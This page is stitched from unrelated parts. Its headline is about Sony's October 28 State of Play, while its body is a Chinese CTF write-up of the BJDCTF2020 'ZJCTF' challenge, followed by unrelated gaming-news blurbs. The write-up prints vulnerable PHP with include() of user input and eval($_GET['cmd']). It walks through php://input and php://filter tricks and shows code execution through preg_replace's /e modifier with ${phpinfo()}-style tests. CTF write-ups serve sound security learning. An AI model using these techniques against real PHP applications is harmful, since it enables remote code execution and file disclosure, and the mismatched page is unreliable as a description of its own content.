2. 程式人生 > 資訊 >索尼 PlayStation 新一期 State of Play 將於 10 月 28 日舉行,公佈多款第三方遊戲

索尼 PlayStation 新一期 State of Play 將於 10 月 28 日舉行,公佈多款第三方遊戲

阿新 發佈:2021-10-27

[BJDCTF2020]ZJCTF,不過如此

開啟靶場

直接給了原始碼

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

有兩個引數,text引數用來開啟一個檔案,檔案內容必須為I have a dream才能通過檢查

這種情況可以想到用PHP的偽協議input來封裝這個檔案,具體方法

text傳參php://input,在post部分寫入檔案內容I have a dream

點選提交可以發現,輸出了一句話,這句話就是file_get_contents函式的輸出結果,證明我們已經通過了if的檢查

接著讀程式碼可以發現,file引數的傳值中不能出現flag,下面還給出了一個提示:next.php,但不知道里面寫了啥,所以可以繼續利用PHP偽協議檢視檔案內容,具體方法

構造?file=php://filter/read=convert.base64-encode/resource=next.php&text=php://input,即可將檔案內容以base64編碼輸出,最後只需解碼即可

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',	//修正符:e 配合函式preg_replace()使用, 可以把匹配來的字串當作正則表示式執行;
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

$_GET as $re => $str 的理解:

這是一個動態賦值的過程,即會將get請求中的引數名作為鍵$re,引數對應的值作為鍵值$str

正則匹配/e的問題

http://www.xinyueseo.com/websecurity/158.html

讀了好幾遍,真的不能理解,於是只能在本地測試嘗試理解

多次本地測試總結:

程式碼環境:

<?php
function complexStrtolower( $regex, $value){
    return preg_replace('/('. $regex.')/ei','strtolower("\\1")',$value);
}
foreach ($_GET as $regex => $value){
    echo complexStrtolower($regex, $value)."n";
}
?>

程式碼環境:

<?php
var_dump(preg_replace('/(.*)/ei','\1','${phpinfo()}'));
?>

程式碼:

<?php
var_dump(strtolower("\\1"));
?>

程式碼:

<?php
var_dump(preg_replace('/(hello)/ei','\1','hello world!'));
?>

程式碼:

<?php
var_dump(preg_replace('/(hello)/ei','goodby','hello world!'));
?>

大概瞭解了,正則匹配中\1代表自己,對應上面就是hello被替換成了自己

繼續測試

程式碼:

<?php
var_dump(preg_replace('/(.*)/ei','\1','${phpinfo()}'));
?>

程式碼:

<?php
function die1(){
    die("!!!!!");
}

var_dump(preg_replace('/(.*)/ei','\1','${die1()}'));
?>

測試發現在${}中可以呼叫函式

這樣的話,那這題就有思路了,我們可以呼叫getFlag()函式,再傳入cmd引數執行命令即可

由於上面那篇大佬的文章也提到了,對於傳入的非法的 $_GET 陣列引數名,會將其轉換成下劃線,所以直接傳.*會無效

但用大佬給的方法,將.*改成\S*也可以輕鬆繞過,於是重新構造payload,訪問物件此時應該變成next.php了

即可拿到flag!

相關推薦

PlayStation 一期 State of Play 10 28 舉行公佈第三方遊戲

10 24 訊息,索尼宣佈 PlayStation 新一期 State of Play 直播將於北京時間 10 28 5 點舉行,屆時展示“之前釋出的遊戲面貌”以及索尼工作室合作伙伴的一些“發現”。瞭解到本次直播時長 20

一期State of Play636點舉行 時長30分鐘

PlayStation官方今日宣佈北京時間63上午6點舉行一期State of Play遊戲釋出會時長約30分鐘。

Steam 品節 10 2 舉行:上百試用版遊戲

9 19 訊息Steam 本週宣佈Steam 品節即將回歸時間為北京時間 10 2 1 時-10 8 1 時。這一活動專為即將推出的新遊戲打造匯聚上百款新遊戲的試用版同時還會有開發者進行直播玩家有機會與開

一期State of Play在週五舉辦 遊戲公佈

互動娛樂在太平洋時間225下午2點舉辦一個30分鐘的State of Play視訊節目北京時間是226(本週五)早晨6點。玩家可在油管或Twitch上觀看。

爆料: A7M4 微單 10 21 釋出3300 萬畫素感測器

10 6 訊息根據外媒 sonyalpharumors 報道可靠訊息稱索尼 A7M4 全畫幅微單相機將於 10 21 正式釋出。這產品此前已經有次爆料目前距離上一代 A7M3(A7 III)相機發布已經過去了 3 年多,因此攝影愛

Xperia 新品中國大陸釋出會官宣:10 26 舉行

10 12 訊息今日下午,索尼中國官方宣佈,索尼 Xperia 新品釋出會將於 10 26 日舉行。其中全球釋出會時間為 2021 年 10 26 11:00中國大陸釋出會為 2021 年 10 26 19:00。目前,索尼 Xperi

武漢 PlayStation 官方授權店 5 28 開業可體驗 PS5

5 27 訊息根據官方訊息武漢糖潮 PlayStation 官方授權店,將於 5 28 正式開業地點位於武漢市江岸區永旺夢樂城武漢金橋店一樓 133 號。這個店鋪與糖潮數碼共用一個空間採用 PS5 主題的裝修風格。

ROG 夏季新品釋出會 5 17 舉行槍神 6 Plus 超競版搭載滿血 RTX 3080 Ti

5 5 訊息華碩玩家國度今日宣佈ROG 夏季新品釋出會將於 5 17 21:00 舉行,slogan 為“超競界”屆時推出多款新品。據介紹新款 ROG 槍神 6 Plus 超競版會搭載“超滿血設計”的英偉達 RTX 3080Ti

傳《生化4重製版》一期State of Play亮相

之前PlayStation官方宣佈北京時間63上午6點舉行一期State of Play遊戲釋出會時長約30分鐘。釋出會重點介紹第三方遊戲以及PSVR2遊戲

1028舉行一期直播 展示第三方遊戲

索尼宣佈將於北京時間10月28日凌晨5點舉行新一輪的State of Play直播活動時長約20分鐘重點介紹一些第三方PS4和PS5遊戲作品以及更新。玩家可以在官方油管或是Twitch進行觀看我們也會第一時間帶來報道。

4 29 舉行 PlayStation 中國發佈會有望釋出國行版 PS5

4 23 訊息 PlayStation 中國官博剛剛宣佈 4 29 (下週四)早上 11:00 舉行 PlayStation 中國發佈會 2021。

PlayStation下一次釋出會或6月初舉行

近日有傳言稱PlayStation下一場釋出會活動6月初舉行這正是每年E3展會舉辦的時間點。昨天遊戲記者Jeff

官宣《毀滅戰士 3:VR 版》 3 29 發售且支援向後相容

PlayStation 官方部落格已 3 3 發表文章稱恐怖射擊遊戲《毀滅戰士 3:VR 版》 3 29 發售登陸 PS VR 平臺並支援向後相容。

PS5 中國上市慶典 5 15 舉辦明日放出最後 200 個名額

5 7 訊息根據 PlayStation 中國官方訊息,索尼 PS5 中國上市慶典將於 5 15 在上海西海岸藝術中心舉辦。本次活動邀請 600 位玩家到現場持續時間為 16:00 至 21:00分為 3 個場次開啟預約。

任天堂一期直面會 9 24 舉行時長約 40 分鐘

9 23 訊息任天堂的最新一期直面會將於北京時間 9 24 6 點舉行,屆時將公佈冬季推出的一系列 Switch 遊戲,直面會時長為 40 分鐘。瞭解到任天堂在 6 月份的 E3 直面會上公佈了《漫威 銀河護衛隊》《奇異

康官宣: 10 14 釋出 Z6II 和 Z7II 微單相機

929訊息康中國今晚宣佈 101420:00舉行康線上直播發佈會屆時Z系列新款相機Z6II 和 Z7II。

php迪士4_每日新聞摘要19/4/12:迪士+1112登陸每月$ 6.99

php迪士4 Plus Facebook might roll Messenger back into the main mobile apps, Acer announced a slew of new stuff, future Android updates might come from Google Play, Falcon Heavy’s su

《文明 6》第五個 DLC 1 28 到來:包含兩個文明及模式、區域

121訊息昨日2K Games 遊戲官方公佈了《文明 6》第五 DLC“越南和忽必烈”包 1 28 正式推出。 DLC 提供給所有擁有擁有《文明 VI:新紀元季票》(New Frontier Pass)的玩家。

PlayStation VR版《Yupitergrad》225推出

開發商Gamedust宣佈虛擬現實解謎平臺遊戲《Yupitergrad》的PlayStation VR版本225以數字化形式推出。

聯想小 & 泡泡瑪特 3 1 晚揭祕首 3C 盲盒可抽小平板電腦 Pro

2 26 訊息聯想小已宣佈聯合泡泡瑪特推出 Yuki 聯名潮玩新品,將於 3 1 晚間直播揭祕首 3C 大盲盒,將於 3 2 開售關於這盲盒的資訊目前還不得而知目前已上架京東商城。